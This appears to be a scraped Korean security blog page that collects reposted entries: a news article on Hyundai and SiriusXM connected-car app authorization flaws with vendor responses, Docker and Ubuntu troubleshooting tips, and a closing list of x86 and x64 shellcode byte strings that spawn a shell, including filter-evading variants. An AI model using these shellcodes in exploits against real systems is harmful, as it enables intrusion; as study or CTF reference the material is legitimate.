블로그 이미지

wtdsoul

,

https://www.bleepingcomputer.com/news/security/hyundai-app-bugs-allowed-hackers-to-remotely-unlock-start-cars/

 

Hyundai app bugs allowed hackers to remotely unlock, start cars

Vulnerabilities in mobile apps exposed Hyundai and Genesis car models after 2012 to remote attacks that allowed unlocking and even starting the vehicles.

www.bleepingcomputer.com

 

Vulnerabilities in mobile apps exposed Hyundai and Genesis car models after 2012 to remote attacks that allowed unlocking and even starting the vehicles.

Security researchers found the issues and explored similar attack surfaces in the SiriusXM "smart vehicle" platform used in cars from other makers (Toyota, Honda, FCA, Nissan, Acura, and Infinity) that allowed them to "remotely unlock, start, locate, flash, and honk" them.

At this time, the researchers have not published detailed technical write-ups for their findings but shared some information on Twitter, in two separate threads (Hyundai, SiriusXM).

 

Hyundai issues

The mobile apps of Hyundai and Genesis, named MyHyundai and MyGenesis, allow authenticated users to start, stop, lock, and unlock their vehicles.

MyHyundai app interface (@samwcyo)

After intercepting the traffic generated from the two apps, the researchers analyzed it and were able to extract API calls for further investigation.

They found that validation of the owner is done based on the user's email address, which was included in the JSON body of POST requests.

Next, the analysts discovered that MyHyundai did not require email confirmation upon registration. They created a new account using the target's email address with an additional control character at the end.

 

Finally, they sent an HTTP request to Hyundai's endpoint containing the spoofed address in the JSON token and the victim's address in the JSON body, bypassing the validity check.

Response to the forged HTTP request, disclosing VIN and other data (@samwcyo)

To verify that they could use this access for an attack on the car, they tried to unlock a Hyundai car used for the research. A few seconds later, the car unlocked.

The multi-step attack was eventually baked into a custom Python script, which only needed the target's email address for the attack.

SiriusXM issues

SiriusXM Connected Vehicle Services is a vehicle telematics service provider used by more than 15 car manufacturers The vendor claims to operate 12 million connected cars that run over 50 services under a unified platform.

Yuga Labs analysts found that the mobile apps for Acura, BMW, Honda, Hyundai, Infiniti, Jaguar, Land Rover, Lexus, Nissan, Subaru, and Toyota, use SiriusXM technology to implement remote vehicle management features.

They inspected the network traffic from Nissan's app and found that it was possible to send forged HTTP requests to the endpoint only by knowing the target's vehicle identification number (VIN).

The response to the unauthorized request contained the target's name, phone number, address, and vehicle details.

Considering that VINs are easy to locate on parked cars, typically visible on a plate where the dashboard meets the windshield, an attacker could easily access it. These identification numbers are also available on specialized car selling websites, for potential buyers to check the vehicle's history.

 

In addition to information disclosure, the requests can also carry commands to execute actions on the cars.

Python script that fetches all known data for a given VIN (@samwcyo)

BleepingComputer has contacted Hyundai and SiriusXM to ask if the above issues have been exploited against real customers but has not received a reply by publishing time.

Before posting the details, the researchers informed both Hyundai and SiriusXM of the flaws and associated risks. The two vendors have fixed the vulnerabilities.


Update 1 (12/1) - Researcher Sam Curry clarified to BleepingComputer what the commands on SiriusXM case can do, sending the following comment:

For every one of the car brands (using SiriusXM) made past 2015, it could be remotely tracked, locked/unlocked, started/stopped, honked, or have their headlights flashed just by knowing their VIN number.

For cars built before that, most of them are still plugged into SiriusXM and it would be possible to scan their VIN number through their windshield and takeover their SiriusXM account, revealing their name, phone number, address, and billing information hooked up to their SiriusXM account.


Update 2 (12/1) - A Hyundai spokesperson shared the following comment with BleepingComputer:

Hyundai worked diligently with third-party consultants to investigate the purported vulnerability as soon as the researchers brought it to our attention.

 

Importantly, other than the Hyundai vehicles and accounts belonging to the researchers themselves, our investigation indicated that no customer vehicles or accounts were accessed by others as a result of the issues raised by the researchers. 

We also note that in order to employ the purported vulnerability, the e-mail address associated with the specific Hyundai account and vehicle as well as the specific web-script employed by the researchers were required to be known.

Nevertheless, Hyundai implemented countermeasures within days of notification to further enhance the safety and security of our systems. Hyundai would also like to clarify that we were not affected by the SXM authorization flaw.

We value our collaboration with security researchers and appreciate this team’s assistance.


Update 3 (12/1) - A SiriusXM spokesperson sent the following comment to BleepingComputer:

We take the security of our customers’ accounts seriously and participate in a bug bounty program to help identify and correct potential security flaws impacting our platforms.

As part of this work, a security researcher submitted a report to Sirius XM's Connected Vehicle Services on an authorization flaw impacting a specific telematics program.

The issue was resolved within 24 hours after the report was submitted.

 

At no point was any subscriber or other data compromised nor was any unauthorized account modified using this method.

Update 12/2/21: This article incorrectly stated the researchers worked for Yuga Labs.

 
블로그 이미지

wtdsoul

,

https://league-cat.tistory.com/347

 

도커 설치 후 도커 명령어 실행 에러 Cannot connect to the Docker daemon at unix:///var/run/docker.sock. Is the dock

Cannot connect to the Docker daemon at unix:///var/run/docker.sock. Is the docker daemon running? 위와 같은 명령어가 뜨면 docker service가 실행이 안되어있는것이다. $sudo systemctl status docker 상태를 확인해 봐라 stop일 것

league-cat.tistory.com

 

Cannot connect to the Docker daemon at unix:///var/run/docker.sock. Is the docker daemon running?

위와 같은 명령어가 뜨면 docker service가 실행이 안되어있는것이다.

$sudo systemctl status docker  // 상태 stop 확인

아래 명령어를 입력하여 실행을 진행해보자

$sudo systemctl start docker
$sudo systemctl enable docker

확인

블로그 이미지

wtdsoul

,

https://doqtqu.tistory.com/178

 

[ubuntu] dpkg was interrupted Error 해결 방법

E: dpkg was interrupted, you must manually run 'sudo dpkg --configure -a' to correct the problem. dpkg가 올바르게 구성되지 않아서 발생하는 오류로, 오류 메세지에 나온 커맨드를 그대로 실행하면 해결할 수 있다. sudo

doqtqu.tistory.com

 

dpkg가 올바르게 구성되지 않아서 발생하는 오류로,

오류 메세지에 나온 커맨드를 그대로 실행하면 해결할 수 있다.

sudo dpkg --configure -a

 

만약 해결되지 않으면 커맨드 입력 전에 $sudo apt-get install -f를 실행해준다.

sudo apt-get install -f
sudo dpkg --configure -a

 

다만, 실행 중 아래와 같은 오류가 발생할 때가 있는데,

 

/usr/sbin/dkms: fork: Cannot allocate memory

 

메모리 부족 문제이므로, 서버 내부의 메모리 사용량 확인이 필요하다.

만약, AWS, Naver Cloud Platform 등과 같은 클라우드 플랫폼을 사용 중이라면 해당 오류 수정을 위해 일시적으로라도 인스턴스 유형을 더 높은 걸로 변경해주면 된다.

 

 

블로그 이미지

wtdsoul

,

https://nuggy875.tistory.com/58

 

Ubuntu 우분투 인터넷 끊김 현상

Ubuntu 우분투 서버를 켜놓고 카페나 외부에서 코딩하는 경우가 많은데, 간헐적으로 Ubuntu 서버 인터넷이 끊겨 난감한 상황이 한 둘 있었다. 이에 해결책을 실행하였고, 앞으로 끊김 현상이 생기는

nuggy875.tistory.com

 

터미널에서 아래 파일을 root권한으로 열고
sudo vim /etc/default/avahi-daemon

아래와 같이 AVAHI_DAEMON_DETECT_LOCAL 의 값을 0으로 설정한다.
AVAHI_DAEMON_DETECT_LOCAL=0

그리고 reboot 이 아닌 sudo shutdown now로 적용을 해주었다.
그렇게 하니 정상적으로 반영되었다.. 이럴수가???

 

이렇게 적용함에도 문제가 발생한다면 재설치를 추천드립니다. (에휴)

블로그 이미지

wtdsoul

,
블로그 이미지

wtdsoul

,

'경로 및 정보' 카테고리의 다른 글

Ubuntu 22.04 끊김 현상  (0) 2025.02.01
docker 설치 & wsl 재설치  (0) 2025.01.31
QEMU로 임베디드 Linux 시스템 에뮬 환경 셋팅  (0) 2025.01.28
User After Free 취약점 관련  (0) 2025.01.28
shell code sample  (0) 2025.01.28
블로그 이미지

wtdsoul

,

'경로 및 정보' 카테고리의 다른 글

docker 설치 & wsl 재설치  (0) 2025.01.31
BloodHound 윈도우 설치 (진행 중)  (0) 2025.01.29
User After Free 취약점 관련  (0) 2025.01.28
shell code sample  (0) 2025.01.28
Protostar - Stack4  (0) 2025.01.28
블로그 이미지

wtdsoul

,
블로그 이미지

wtdsoul

,

https://orcinus-orca.tistory.com/5

 

내가 쓰려고 적어두는 쉘코드(Shell Code)

직접 쉘코드를 만드는 과정을 겪어보니 쉘코드를 보는 시선이 약간 바뀐 것 같다. 소중한 친구들... 26-byte shell code(x86)_scanf우회 쉘코드 \x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\x

orcinus-orca.tistory.com

 

26-byte shell code(x86)_scanf우회 쉘코드

\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x08\x40\x40\x40\xcd\x80


25-byte shell code(x86)

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80


26-byte shell code(x86)

\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x08\x40\x40\x40\xcd\x80


41-byte shell code(x86)

\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80


48-byte shell code(x86)_\x2f없는 쉘코드

\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81


23-byte shell code(x64)

\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05


31-byte shell code(x64)

\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05
 
블로그 이미지

wtdsoul

,